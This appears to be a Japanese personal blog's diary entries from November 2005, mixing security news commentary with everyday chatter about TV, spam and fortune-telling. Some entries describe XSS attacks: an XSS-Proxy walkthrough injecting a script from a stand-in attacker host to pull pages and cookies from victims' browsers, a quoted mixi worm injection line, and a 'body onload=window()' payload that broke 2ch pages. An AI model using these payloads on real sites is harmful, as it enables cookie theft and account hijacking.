最新パッチ適用済みの Windows 2000 で、某所の exploit が再現できたという風のウワサも聞きました。 インターネット側では、アクティブスクリプトを無効にしておいた方が無難かも知れませんね。関連: * Microsoft Internet Explorer "window()" Arbitrary Code Execution Vulnerability (Secunia)
関連: * Internet Explorer の onLoad イベントを処理する方法の脆弱性のため、リモートでコードが実行される (Microsoft)
[雑談] * Google Analytics、需要過剰で新規ユーザーの受け入れ停止 (ITmedia)
textile無償化の直後から人気が高すぎてパフォーマンス問題が報告されていたアクセス解析サービスGoogle Analyticsが、ついに新規ユーザーの受け入れを停止した。
あまりの人気でトラブル続出の Google Analytics ですが、とうとう新規ユーザの受け入れ停止だそうです。 ただし、一時的な制限であり、今後 態勢が整い次第、再開する予定のようです。[セキュリティ] * Google Search Applianceにクロスサイトスクリプティングの危険性 (ITmedia)
Googleの企業向け検索アプライアンスにクロスサイトの脆弱性。
textileGoogle Search Applianceでは検索インタフェースに使われているXSLTによるカスタマイズが可能だが、…XSLTスタイルシートのパスに、リモートのURLを設定可能となっており、クロスサイトスクリプティング(XSS)、ファイルの発見、サービス一覧表示、任意のコマンド実行などが行われる危険性があると、Metasploitは指摘している。
「任意のコマンド実行」の部分は微妙すぎ・・・。(^-^;  Google、XSS 多すぎですねw関連: * Google Search Appliance proxystylesheet Flaws (Metasploit)
[雑談] * 人が幸せになるITを――オリンパスの「インスパイア型ユビキタス」 (ITmedia)
これまたSFのようなシステムです。 未来が楽しみ〜。 (今の時期、「インスパイア」は使わない方が良いかも?w)[セキュリティ] * Black Hat Japan 2005 - クロスサイトスクリプティング、どんな攻撃で、どう防ぐか (MYCOM PC WEB)
クロスサイトスクリプティングの種別が分類されていました:```textile・ Direct EchoJavaScriptのコードを埋め込んだURLを実行したりリンクをクリックしたりすると、そのスクリプトが実行されてしまうというもの。(もっともよく使われる手法)・ HTML Injectionクリックなどユーザーの操作は必要なく、コードが注入されたHTMLメールやブログページなどを閲覧しただけでスクリプトが実行される。(XSSの攻撃方法の中でもっとも危険)・ XSS Redirect Disguiseリダイレクト先のURLの表示を偽装、実際には別のサイトにアクセスしている。・ XSS Page-Rewritingページを書き換えることで正式なサイトの中の一部に別ドメインに送信されるフォームを作成できてしまう。・ XSS-Proxy詳細不明。 **[追記]** ツールの名前でした。(^-^; ⇒* An advanced Cross-Site-Scripting (XSS) attack tool
・ XSS Remote Control全画面のIFRAMEでスクリプトを読み込み、Webサイトの偽装が行える。```XSS-Proxy ってナニモノだろう? Microsoft.XMLHTTP を使うようなスクリプトを実行させて別サイトに接続させることを言っているのかなぁ。 (この資料見たいな〜。 どこかに置いてありませんかね?)**[追記]** はせがわさんに資料の在り処を教えて頂きました♪(^-^)  ・ * Phising with Super Bait (blackhat.com)
**[pdf]**

2005/11/23(水)水曜日ー。(面白ーい。)

[セキュリティ] * An advanced Cross-Site-Scripting attack tool,XSS-Proxy
最初、攻撃ツールかと思ったのですが、違いました。(^-^;  でも、かなり興味深い!!XSS の問題を利用して、被害者を、攻撃者サイト(XSS-Proxy)に数秒間隔でアクセスさせ、任意の URL へのアクセスや Cookie の送信などの命令をインタラクティブに実行させる手法のデモ。1.攻撃者側の準備 (http://attacker.example.jp/)(1) Perl の実行環境を準備。(2) XSS-Proxy をダウンロード&実行。 
(3) http://attacker.example.jp/ で XSS-Proxy が動作。(4) ブラウザで http://attacker.example.jp/admin にアクセス。 以後、適当なタイミングでリロードする。(被害者の接続を待つ。)2.XSS の問題があるサイト (http://vulnsite.example.jp/)攻撃者は、http://vulnsite.example.jp/ のどこかのページに、XSS 問題を利用して、「<script src="http://attacker.example.jp/xss2.js"></script>」*1を挿入する。3.被害者攻撃者に誘導されるなどして、スクリプト(*1) が挿入されたページにアクセス。 スクリプトが実行され、攻撃者サイトに情報(とりあえず、トップページのHTMLソース)が送信される。4.攻撃者 (http://attacker.example.jp/)(1) http://attacker.example.jp/admin に被害者からの接続が表示される。(2) Document Results: リンクをクリックすると、被害者が見たサイトのトップページ(http://vulnsite.example.jp/)が表示される。 そこに存在する URL をクリックすると、被害者側のブラウザに、クリックした URL を取得するように命令を送る! (実際には、被害者側のブラウザが数秒おきに命令の有無を確認しに、XSS-Proxy にアクセスしている。) (アクセスするのは被害者のブラウザなので、例えば、ログインが必要な画面なども(被害者がログインしていれば)取得することができる。)(3) URL を指定して、コンテンツを取得させる命令を送ることもできる。(4) document.cookie や document.domain の内容を送るよう命令することもできる。こんなインタラクティブに被害者のブラウザを操作できるなんて、興味深いですね。[出来事] * ポータブルハードディスク「HDP-Uシリーズ」ウイルス混入のお詫びと対処のご案内 (I-O DATA)
田中.ROMさんが * openmyaML に投げて
いました。
textile弊社ポータブルハードディスク「HDP-Uシリーズ」の一部製品型番の特定ロットに、ウイルスが混入している可能性があることが確認されました。
混入したのは、* WORM_TOMPAI.A
というトロイの木馬とのこと。 FAT32フォーマット済み&「iSPIS」(アイ・スパイス)と呼ばれるHDDロックツールを搭載した状態での出荷とのことなので、そこに混じったのかな? (ロット毎に原盤が違ってたりするものなんだろうか? そんなに簡単に混じれるものなのかな?)[雑談] 今日着たspam。今日着たspam、差出人が 横田めぐみ だった・・・。(^-^;
textileSubject: ('-'*)オヒサ♪最近メールくれないから、メールしちゃった><もう、このメールアドレス使わなくなるから連絡してみたよぉ〜風引いてるの?返事してよ?
URL等の記述は無し。 この文面だったら、差出人の名前でふざけてさえいなかったら、(女の子の友達多い人だったら)騙されるんじゃないかなぁ。 なんで 横田めぐみ にしたのか聞いてみたいwま、「X-Mailer: Easy DM free」だったのは減点ですけどw[出来事] mixi に「はまちちゃん」再来?!![](/image/img200511232129_hamachi2.PNG)現在は修正されているようですが、どうやら、アンケートに回答するCGI(reply_enquete.pl)の選択項目の部分に、XSS の問題があったようです。 (今回は CSRF じゃないかも知れません。) ページ中に、「<script src="http://xxxxxxxxxxxxx/bh6.js"></script>」を挿入して、外部の JavaScript を呼びに行っていたようです。(私が見に行った時には、すでに Not Found になっていたので、中身は見ていませんが。) このスクリプトによって、日記に写真のような文章が勝手に書き込まれてしまい、どんどん増殖していったようです。 1,200件くらいひっかかってますかね?(汗**[追記]** 今回の手法は、iframe で add_diary.pl を開き、その後の文書入力⇒確認画面⇒書き込み完了 の操作を JavaScript を用いて遷移させていたもののようです。 mixi では、確認画面で post_key というランダムな値を生成することで、一般的な CSRF への対策は済んでいましたが、今回のように XSS を悪用して 正常な流れで処理を行われたらどうしようもありませんね・・・。

2005/11/24(木)木曜日ー。(うらない当たった・・・。)

[雑談] 今日の占い@めざましテレビ今日もっとも運勢が悪いのは、・・・射手座の私。orz
textile周囲に振り回されてグッタリ。相手の意見に流され過ぎかも。嫌なことはきっぱり否定して。
本当にぐったりですw  思えば、朝、自動販売機で50円のお釣りが、全部10円玉で出てきた時点で悪い予感はしていた・・・。(←関係無いw)[動物] * おもしろムービー 超ねこちゃん達
でも、これ見てたら、ちょっとだけ元気が出たw[セキュリティ] * ネット銀行安心の新常識(2)(IT Pro)
記事中に、「* 主なインターネットバンキングのセキュリティ対策
」という表があります。 各銀行が取っている対策がまとまっていて良い感じかも知れません。(^-^)[雑談] * セキュリティニュースレター
まっちゃさんだー♪ (ずきんさん や はせがわさんのところで見つけました。)[雑談] * ストレスが情報漏えいの原因? (ITmedia)
textileラックとエンパワー・ジャパンは、従業員のモラル低下やストレスが情報漏えいなどの事故の原因となるとの観点から、メンタルヘルスケアを中心にしたセキュリティサービスを開発すると発表した。
情報漏えい事故の原因は・・・ストレスだそうです。 う、うーむ。 正直な話、最初は冗談記事かと思いましたがw (* ずきんさん
のところで知りました。)[雑談] * 新連載:ツールを使ってネットワーク管理(3) 私用メールする子にお仕置きを (@IT)
う、うーむ。 赤枠の注意書きがあるとは言え、なんか軽率な印象を受ける記事ですね・・・。 「私用メールを覗き見する」以外に、もっとネットワーク管理っぽいスニファの使い方は無かったんかい。(^-^;それに、どうせ悪役に徹するんなら、わざわざ間にリピータを挟んだりせずに arpspoof でも・・・。(マテ

2005/11/25(金)金曜日ー。(かろうじて更新。)

[雑談] * 「ハッカー集団Titan Rainの背後に中国政府の影」--セキュリティ専門家が指摘 (CNET)
アメリカ政府のサイトに侵入して、航空機の仕様やフライト計画ソフトウェアなどの米軍の機密情報を盗み出した疑いがかけられている「Titan Rain」という集団ですが、
textileこのハッカー集団は20人程度で構成されると思われる。Pallerは、盗み出された情報の受け取り手として、最も疑わしいのは中国政府であると述べた。
・・・ということなんだそうです。(^-^;  ちなみに、
textileその後のTime誌の報道によると、今度はTitan Rainが米国のセキュリティ専門家Shawn Carpenterによって反撃されたという。
セキュリティ専門家って、そういうことするんだー? (←無垢なまなざしでw)[雑談] * 「ソレハ イキモノ?」――ブログが鍛えた人工知能「20Q」 (ITmedia)
textile20Qは「はい」「いいえ」で答えられる質問――「ソレハ イキモノ?」「ボタンガ タクサン ツイテマスカ?」など――を20前後ユーザーに投げかけ、その答えから、ユーザーが思い浮かべたものを当てるおもちゃだ。
あぁ、これ、英語版をやったことがあります。 手のひらサイズのおもちゃになってたのね♪

2005/11/26(土)土曜日ー。(そろそろ一区切り。)

[雑談] * アイリス心の相談室
  • 割り箸バイク便日記さん
のところにあったので、やってみました♪
textileヤマガタさんの診断結果  あなたの心のストレス度 85 %真面目で謙虚な面があり、今よりももっと大きな自分になりたいという気持ちを強く持っています。…自分の些細な落ち度や不完璧な部分に敏感で、それらを気にしすぎて悩みを大きくしてしまう傾向があります。相手の心に踏み込んでいくのが苦手なほうで、人間関係では受身のことが多いようです。会話もこちらから積極的に話しかけるよりも、相手が話しかけてくれればそれに応じて楽しい話をすることも出来ます。もう少し自分の気持ちに自信を持って、積極的に話しかけていくと良いと思います。 陥りやすい精神的なお悩み何に対しても頑張りすぎる傾向があり、…精神的にはかなり疲れが溜まっているようです。真面目な気持ちが強いゆえに、不調やつらいことがあると立ち直るのに時間がかかりやすく、人との関係においてもマイナス的にとらえてしまうことがあり、対人ストレスを感じやすいです。
心のストレス85%だそうです。 この分だと、* 情報漏えい事故を起こすのも時間の問題20051124#p05
ですかね?w[雑談] * 理系のための恋愛論 第193回 うちに遊びにおいでよ (MYCOM PC WEB)
実は、AちゃんはRくんのことが好きで、それを知っていた、Aちゃんの同期の子がさりげなくアシストした、という展開ぢゃなかったのかw  ぅーん、引越しはともかく、特に何も無い普通のときに家に女の子誘うなんて、どう頑張ってもヨコシマな感じとは切り離せない気も。(ぇ

2005/11/27(日)日曜日ー。(ぎょえぇ〜〜。)

[映画] 仄暗い水の底からぁーん、怖い映画嫌いなのに見なきゃ良かったw  エレベーターで黒木瞳さんに、女の子が がばーって覆いかぶさるシーンで、わたしゃもう失神寸前でした。(←大げさw)[雑談] * FreeGamePlayer presents Flash Crisis
Flashゲーム。 スペースキーでリロード、マウスクリックで撃つですw  この手のゲーム、ニガテです。 やってるうちに、なんだか、乗り物酔いみたいになって気持ち悪くなるんですよね・・・。(^-^;[雑談] * 緊急レポート あなたについて100人に聞きました!
textile100人に聞きました。「ズバリ、ヤマガタさんといえば?」 日本語が話せない …64人  愉快 …19人  離婚 …16人  トランポリン …1人 100人に聞きました。「最後に、ヤマガタさんに一言!」 あなたに似てると言われます …42人  例の件よろしく …32人  浮気もほどほどに …15人  愛してます …10人  責任取って …1人
え〜。 結婚もしてないのに、離婚だの浮気だの言われても〜。(^-^;・・・「愛してます」の人と、「責任取って」の人は、ぜひ後でメールくださいw[雑談] pya!
  • ありがとう
ぁぅ。 こういうのダメ〜。 ピアノの音を聴いただけで泣きます。(嘘
  • Don’t worry
B、ヒドいw
  • ヒッキー
あ〜、見える見える!!可愛い猫さん達・・・。
  • 終わった?nya
  • 今日の獲物nya
  • コピーするnya
  • nya、読めないんですけど
  • デュエットnya
  • ぞうきんがけするnya

2005/11/28(月)月曜日ー。(ひと区切り。)

[雑談] * はてなダイアリーが Google Analytics に対応
![](/image/img200511281818_hatena_google.png)
  • まっちゃさん
の要望により、はてなダイアリーが Google Analytics に対応してくれたようです。 すごーいw  Google Analytics が新規登録の再開をするのが待ち遠しいですね〜。 (有料オプションの「はてなカウンター」の利用が減るのでは?という意見もあるようですが・・・。(^-^;)[出来事] * アイコラ投稿の国交省元幹部ら逮捕 (ITmedia)
textile女性タレントと別の女性の写真を合成した「アイコラ」写真をインターネットで公開したなどとして、警視庁は11月28日、名誉き損の疑いで横浜市の元国土交通省幹部の男(58)ら4人を逮捕した。
「ほかのファンにも見せてあげたかった」のだそうです。(^-^;[出来事] * Yahoo!ニュースを偽装した記事の作者、著作権法違反の疑いで逮捕 (INTERNET Watch)
textile10月にYahoo!ニュースを装い、「中国軍 沖縄に侵攻」などと虚偽の記事がインターネット上に公開された事件について、警視庁生活経済課、愛宕署、三田署は11月28日、長崎県長崎市在住の男性を著作権法違反の疑いで逮捕した。
結局、著作権法違反とするしかないのね。 もし、(そっくりな)ロゴや、ページのソースを1から作っていた場合は、どんな罪状になるんだろう? 商標法違反?[TV][あいのり] #294 SAY YESウクライナ横断中。やじるし: ヒデ->アヤ<=>?嵐。 tk?<=>MIE->スーザン。 梅ちゃん。MIEがtkの告白に答えを出す運命の朝。 昨日ギリギリまで悩んでいたというMIEに、歌告白で最後の一押しをするtk。 それが悪かった(笑)のか分からないが・・・tk「俺にはMIEが必要。MIEのことが好きだ。だから一緒に日本帰ってくれ」MIE「・・・・・・tkごめん。MIE日本・・・今、tkと日本には帰られへん。ホンマにごめん。なんかtkに何が足りないとか、そんなんじゃ全くないねんホンマに」tk、フラれてしまいました・・・。tkと別れた後。 MIEの日記にはそのときの気持ちが。MIE“このまま残ってもスーザンが好きになってくれる保証なんて全くない。でも、あきらめて今日本には帰れない!”そして、ウクライナを出て、次の国、あいのり63カ国目 ルーマニアへ。 ここ、ルーマニアで、ヒデはとうとう14ヶ国目に。(関ちゃんを抜かして、長旅記録、単独首位に!) 気づいてみれば、約1年半も あいのり し続けていることに・・・。ヒデ“国の数言うの恥ずかしかったけど、逆にスッキリした。ありがとうくす玉”新メンバー: アレック (ソコル・アレックス・英人) 28歳 奈良県出身塾講師あいのり14カ国目となったヒデ。 今まで書き溜めていた 17冊の日記帳とそこに書いていた自分のポエムを読み返す。ヒデ“面白いな。実はあの時に書いていたポエムが今の未来の自分に対しての手紙だったんだ”そしてヒデは目覚めました!ヒデ「今日から僕のことを『壊れたホテル』と呼んで下さい」スタッフ「そのココロは?」ヒデ「誰も止められない!(泊められない)」 ・・・おいっ。(笑)来週は、とうとう梅ちゃんに好きな人ができるらしい?! 期待♪⇒* 今週のあいのり
、* あいのりウラ話(tkからの手紙)

2005/11/29(火)火曜日ー。(わふわふ。)

[雑談] * 「音痴」は差別的 呼称の言い換えを検討 (虚構新聞社)
textile「音痴の『痴』の部分は差別的ではないか」という議題が持ち上がった。その後検討したところ、「痴呆」を「認知症」と言い換えるなど、差別的用語を言い換える今日の風潮を尊重し、音痴学会でも「音痴」の言い換えを決定した。
ウソニュースですw  言い換え案が「歌の不自由な人」はともかく、「中居症」はっ!(笑)[出来事] Norton Internet Security が敏感過ぎな話
  • 葉っぱさん
が、ブラウザを起動すると同時に「セキュリティ警告」の画面が出る!と思ったら、ブラウザが RSS を自動取得しに行ったときにエントリに「onload=window()」の話があってそれを検知してた、なんて話をしていましたが、その後、```textile・ * Norton Internet Securityが原因で2chのあらゆる板にアクセス不能に (2ch.net)
・ * 【ノートン】インターネットセキュリティ Ver.77【2006】#698-n (2ch.net)
```という話があったそうです。 (ネタ元: * セキュリティホールmemo
)メールアドレス欄に、「mailto:<body onload=window()>」を入れて投稿すると軒並み読めなくなる、という仕組みだったようです。(^-^;[雑談] * ICANN、1文字のWebアドレスの開放を検討 (ITmedia)
textile「a.com」「b.org」「c.net」などのアドレスが取れるようになるかもしれない。ICANNが1文字ドメイン名を解放するかどうか検討中だ。
ものすごく競争率高いですよね〜。 ヘタしたら100万ドル超えるような価格が付くかも知れないそうです。 オークションにでもかけて、ICANN の運営費を稼ぎ出すつもりかもw[雑談] * 高級ホテルで“ブログ付き挙式”を (ITmedia)
textileホテルの挙式プランにブログ構築サービスが。2万1000円(4カ月間)で、式の様子や結婚生活を紹介するブログを構築・公開できる。…ブログ終了後は、コンテンツを収録したDVDがもらえる。
コンセプトは良いとして、延長が1ヶ月あたり1万500円ってどうなのよ。 (オドロキの価格!)  最初からフリーのブログサービスで始めた方が良くないかい?(^-^;

2005/11/30(水)水曜日ー。(int21.h.comってw)

[製品] * フューチャーテクノロジー研、ソフトなしで情報漏出防止 (日経)
  • ここ
では無さそうだし、* これ
でも無さそうだけど、いったいホームページはどこに?
textileセキュリティー技術のフューチャーテクノロジー研究所は専用機器を用いて社内ネットワークの情報漏出を自動的に防ぐ技術を開発した。…ボード状の機器をネットワーク管理サーバーに組み込むと、共有情報を自動的に暗号化する。暗号を解除する場合は、ネットワークにつながるパソコンにUSBメモリー型のマイコンキーを差し込む。暗号は自動解除され、情報が閲覧できるようにした。
わぉ。 どういう仕組みなんだろう。 共有情報(Windowsの共有?)を暗号化するらしい。 もちろん、USBキーを持つマシン上でコピーされたら終わりなんだろうけど・・・。[雑談] * ブログで自滅する人々 (デジタルARENA)
現在、第6回まで連載が進んでいるようです。[雑談] キモ可愛い感覚が分からないw 例えば、* むーちゃん
が “キモ可愛い” そうですが。 微妙w[セキュリティ] * SunのJREに深刻な脆弱性 (ITmedia)
Javaランタイム環境(JRE)に深刻な脆弱性が存在。
textile「リフレクション」APIの利用に関するエラーや、JREに含まれるJMXインプリメンテーションのエラーに関連して複数の脆弱性が存在し、これを突かれると、不正アプレットを使ってローカルファイルの読み込みや書き込み、ローカルアプリケーションの実行ができてしまうという。
それぞれ Sun Microsystems から問題を修正するアップデートが公開されている。関連: * Sun Java JRE Sandbox Security Bypass Vulnerabilities (Secunia)
[雑談] * 日本人の給料
フジテレビ社員の平均年収1,567万円・・・。 いいなぁ〜。 (ネタ元: * kinnekoさんとこ
)[雑談] * 知ってるようで、知らない、「ビデ」のこと (ExciteBit)
居酒屋にある、気持ち悪い時に利用するような容器かと思ったw